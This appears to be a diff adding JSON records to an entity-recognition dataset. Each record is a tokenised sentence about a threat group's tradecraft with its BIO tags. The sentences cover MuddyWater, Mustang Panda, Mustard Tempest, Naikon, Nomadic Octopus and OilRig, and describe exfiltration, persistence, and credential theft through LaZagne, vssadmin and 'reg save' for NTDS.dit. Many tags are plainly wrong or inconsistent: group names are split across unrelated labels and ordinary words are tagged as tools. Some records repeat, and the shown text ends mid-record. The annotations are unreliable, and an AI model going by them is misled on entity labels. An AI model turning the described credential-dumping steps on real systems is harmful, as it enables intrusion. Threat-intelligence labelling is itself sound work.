"MuddyWater", + "has", + "used", + "a", + "custom", + "tool", + "for", + "creating", + "reverse", + "shells." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Features", + "I-Features", + "B-Tool" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "leveraged", + "WMI", + "for", + "execution", + "and", + "querying", + "host", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "encrypted", + "documents", + "with", + "RC4", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "RAR", + "to", + "create", + "password-protected", + "archives", + "of", + "collected", + "documents", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "used", + "custom", + "batch", + "scripts", + "to", + "collect", + "files", + "automatically", + "from", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "junk", + "code", + "within", + "their", + "DLL", + "files", + "to", + "hinder", + "analysis." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "a", + "legitimately", + "signed", + "executable", + "to", + "execute", + "a", + "malicious", + "payload", + "within", + "a", + "DLL", + "file." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "have", + "acquired", + "C2", + "domains", + "prior", + "to", + "operations." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "an", + "additional", + "filename", + "extension", + "to", + "hide", + "the", + "true", + "file", + "type." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "leveraged", + "the", + "legitimate", + "email", + "marketing", + "service", + "SMTP2Go", + "for", + "phishing", + "campaigns." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "a", + "customized", + "PlugX", + "variant", + "which", + "could", + "exfiltrate", + "documents", + "from", + "air-gapped", + "networks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "exploited", + "CVE-2017-0199", + "in", + "Microsoft", + "Word", + "to", + "execute", + "code." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Features", + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "will", + "delete", + "their", + "tools", + "and", + "files,", + "and", + "kill", + "processes", + "after", + "their", + "objectives", + "are", + "reached." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "searched", + "the", + "entire", + "target", + "system", + "for", + "DOC,", + "DOCX,", + "PPT,", + "PPTX,", + "XLS,", + "XLSX,", + "and", + "PDF", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda's", + "PlugX", + "variant", + "has", + "created", + "a", + "hidden", + "folder", + "on", + "USB", + "drives", + "named", + "<code>RECYCLE.BIN</code>", + "to", + "store", + "malicious", + "executables", + "and", + "collected", + "data." + ], + "ner_tags": [ + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "downloaded", + "additional", + "executables", + "following", + "the", + "initial", + "infection", + "stage." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "<code>InstallUtil.exe</code>", + "to", + "execute", + "a", + "malicious", + "Beacon", + "stager." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "stored", + "collected", + "credential", + "files", + "in", + "<code>c:\\windows\\temp</code>", + "prior", + "to", + "exfiltration.", + "Mustang", + "Panda", + "has", + "also", + "stored", + "documents", + "for", + "exfiltration", + "in", + "a", + "hidden", + "folder", + "on", + "USB", + "drives." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "sent", + "malicious", + "files", + "requiring", + "direct", + "victim", + "interaction", + "to", + "execute." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "sent", + "malicious", + "links", + "including", + "links", + "directing", + "victims", + "to", + "a", + "Google", + "Drive", + "folder." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "names", + "like", + "`adobeupdate.dat`", + "and", + "`PotPlayerDB.dat`", + "to", + "disguise", + "PlugX,", + "and", + "a", + "file", + "named", + "`OneDrive.exe`", + "to", + "load", + "a", + "Cobalt", + "Strike", + "payload." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "mshta.exe", + "to", + "launch", + "collection", + "scripts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "vssadmin", + "to", + "create", + "a", + "volume", + "shadow", + "copy", + "and", + "retrieve", + "the", + "NTDS.dit", + "file.", + "Mustang", + "Panda", + "has", + "also", + "used", + "<code>reg", + "save</code>", + "on", + "the", + "SYSTEM", + "file", + "Registry", + "location", + "to", + "help", + "extract", + "the", + "NTDS.dit", + "file." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "delivered", + "initial", + "payloads", + "hidden", + "using", + "archives", + "and", + "encoding", + "measures." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "malicious", + "PowerShell", + "scripts", + "to", + "enable", + "execution." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "<code>tasklist", + "/v</code>", + "to", + "determine", + "active", + "process", + "information." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "created", + "the", + "registry", + "key", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\AdobelmdyU</code>", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "installed", + "TeamViewer", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "a", + "customized", + "PlugX", + "variant", + "which", + "could", + "spread", + "through", + "USB", + "connections." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "created", + "a", + "scheduled", + "task", + "to", + "execute", + "additional", + "malicious", + "software,", + "as", + "well", + "as", + "maintain", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "searched", + "the", + "victim", + "system", + "for", + "the", + "<code>InstallUtil.exe</code>", + "program", + "and", + "its", + "version." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "spearphishing", + "attachments", + "to", + "deliver", + "initial", + "access", + "payloads." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "delivered", + "malicious", + "links", + "to", + "their", + "intended", + "targets." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "delivered", + "web", + "bugs", + "to", + "profile", + "their", + "intended", + "targets." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "servers", + "under", + "their", + "control", + "to", + "validate", + "tracking", + "pixels", + "sent", + "to", + "phishing", + "victims." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "encrypted", + "C2", + "communications", + "with", + "RC4." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "gathered", + "system", + "information", + "using", + "<code>systeminfo</code>." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "<code>ipconfig</code>", + "and", + "<code>arp</code>", + "to", + "determine", + "network", + "configuration", + "information." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "<code>netstat", + "-ano</code>", + "to", + "determine", + "network", + "connection", + "information." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "hosted", + "malicious", + "payloads", + "on", + "DropBox", + "including", + "PlugX." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "embedded", + "VBScript", + "components", + "in", + "LNK", + "files", + "to", + "download", + "additional", + "files", + "and", + "automate", + "collection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "communicated", + "with", + "its", + "C2", + "via", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "used", + "DropBox", + "URLs", + "to", + "deliver", + "variants", + "of", + "PlugX." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "executed", + "HTA", + "files", + "via", + "cmd.exe,", + "and", + "used", + "batch", + "scripts", + "for", + "collection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustang", + "Panda", + "has", + "executed", + "PowerShell", + "scripts", + "via", + "WMI." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mustang", + "Panda's", + "custom", + "ORat", + "tool", + "uses", + "a", + "WMI", + "event", + "consumer", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "operates", + "a", + "global", + "network", + "of", + "compromised", + "websites", + "that", + "redirect", + "into", + "a", + "traffic", + "distribution", + "system", + "(TDS)", + "to", + "select", + "victims", + "for", + "a", + "fake", + "browser", + "update", + "page." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "used", + "drive-by", + "downloads", + "for", + "initial", + "infection,", + "often", + "using", + "fake", + "browser", + "updates", + "as", + "a", + "lure." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "injected", + "malicious", + "JavaScript", + "into", + "compromised", + "websites", + "to", + "infect", + "victims", + "via", + "drive-by", + "download." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "deployed", + "secondary", + "payloads", + "and", + "third", + "stage", + "implants", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "lured", + "users", + "into", + "downloading", + "malware", + "through", + "malicious", + "links", + "in", + "fake", + "advertisements", + "and", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "posted", + "false", + "advertisements", + "including", + "for", + "software", + "packages", + "and", + "browser", + "updates", + "in", + "order", + "to", + "distribute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "used", + "the", + "filename", + "`AutoUpdater.js`", + "to", + "mimic", + "legitimate", + "update", + "files", + "and", + "has", + "also", + "used", + "the", + "Cyrillic", + "homoglyph", + "characters", + "С", + "`(0xd0a1)`", + "and", + "а", + "`(0xd0b0)`,", + "to", + "produce", + "the", + "filename", + "`Сhrome.Updаte.zip`." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "poisoned", + "search", + "engine", + "results", + "to", + "return", + "fake", + "software", + "updates", + "in", + "order", + "to", + "distribute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "acquired", + "servers", + "to", + "host", + "second-stage", + "payloads", + "that", + "remain", + "active", + "for", + "a", + "period", + "of", + "either", + "days,", + "weeks,", + "or", + "months." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "sent", + "victims", + "emails", + "containing", + "links", + "to", + "compromised", + "websites." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "used", + "implants", + "to", + "perform", + "system", + "reconnaissance", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mustard", + "Tempest", + "has", + "hosted", + "payloads", + "on", + "acquired", + "second-stage", + "servers", + "for", + "periods", + "of", + "either", + "days,", + "weeks,", + "or", + "months." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "used", + "the", + "RoyalRoad", + "exploit", + "builder", + "to", + "drop", + "a", + "second", + "stage", + "loader,", + "intel.wll,", + "into", + "the", + "Word", + "Startup", + "folder", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "used", + "DLL", + "side-loading", + "to", + "load", + "malicious", + "DLL's", + "into", + "legitimate", + "executables." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "used", + "administrator", + "credentials", + "for", + "lateral", + "movement", + "in", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "convinced", + "victims", + "to", + "open", + "malicious", + "attachments", + "to", + "execute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "renamed", + "a", + "malicious", + "service", + "<code>taskmgr</code>", + "to", + "appear", + "to", + "be", + "a", + "legitimate", + "version", + "of", + "Task", + "Manager." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "disguised", + "malicious", + "programs", + "as", + "Google", + "Chrome,", + "Adobe,", + "and", + "VMware", + "executables." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "used", + "the", + "LadonGo", + "scanner", + "to", + "scan", + "target", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "modified", + "a", + "victim's", + "Windows", + "Run", + "registry", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "used", + "a", + "netbios", + "scanner", + "for", + "remote", + "machine", + "identification." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "used", + "schtasks.exe", + "for", + "lateral", + "movement", + "in", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "uses", + "commands", + "such", + "as", + "<code>netsh", + "advfirewall", + "firewall</code>", + "to", + "discover", + "local", + "firewall", + "settings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "used", + "malicious", + "e-mail", + "attachments", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "uses", + "commands", + "such", + "as", + "<code>netsh", + "interface", + "show</code>", + "to", + "discover", + "network", + "interface", + "settings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naikon", + "has", + "used", + "WMIC.exe", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nomadic", + "Octopus", + "executed", + "PowerShell", + "in", + "a", + "hidden", + "window." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nomadic", + "Octopus", + "has", + "used", + "malicious", + "macros", + "to", + "download", + "additional", + "files", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nomadic", + "Octopus", + "as", + "attempted", + "to", + "lure", + "victims", + "into", + "clicking", + "on", + "malicious", + "attachments", + "within", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Nomadic", + "Octopus", + "attempted", + "to", + "make", + "Octopus", + "appear", + "as", + "a", + "Telegram", + "Messenger", + "with", + "a", + "Russian", + "interface." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "O" + ] + }, + { + "tokens": [ + "Nomadic", + "Octopus", + "has", + "used", + "PowerShell", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Nomadic", + "Octopus", + "has", + "targeted", + "victims", + "with", + "spearphishing", + "emails", + "containing", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nomadic", + "Octopus", + "used", + "<code>cmd.exe", + "/c</code>", + "within", + "a", + "malicious", + "macro." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "used", + "the", + "Plink", + "utility", + "and", + "other", + "tools", + "to", + "create", + "tunnels", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "automated", + "collection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "brute", + "force", + "techniques", + "to", + "obtain", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "credential", + "dumping", + "tools", + "such", + "as", + "LaZagne", + "to", + "steal", + "credentials", + "to", + "accounts", + "logged", + "into", + "the", + "compromised", + "system", + "and", + "to", + "Outlook", + "Web", + "Access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "various", + "types", + "of", + "scripting", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "a", + "CHM", + "payload", + "to", + "load", + "and", + "execute", + "another", + "malicious", + "file", + "once", + "delivered", + "to", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "credential", + "dumping", + "tools", + "such", + "as", + "LaZagne", + "to", + "steal", + "credentials", + "to", + "accounts", + "logged", + "into", + "the", + "compromised", + "system", + "and", + "to", + "Outlook", + "Web", + "Access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "credential", + "dumping", + "tools", + "such", + "as", + "LaZagne", + "to", + "steal", + "credentials", + "to", + "accounts", + "logged", + "into", + "the", + "compromised", + "system", + "and", + "to", + "Outlook", + "Web", + "Access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", 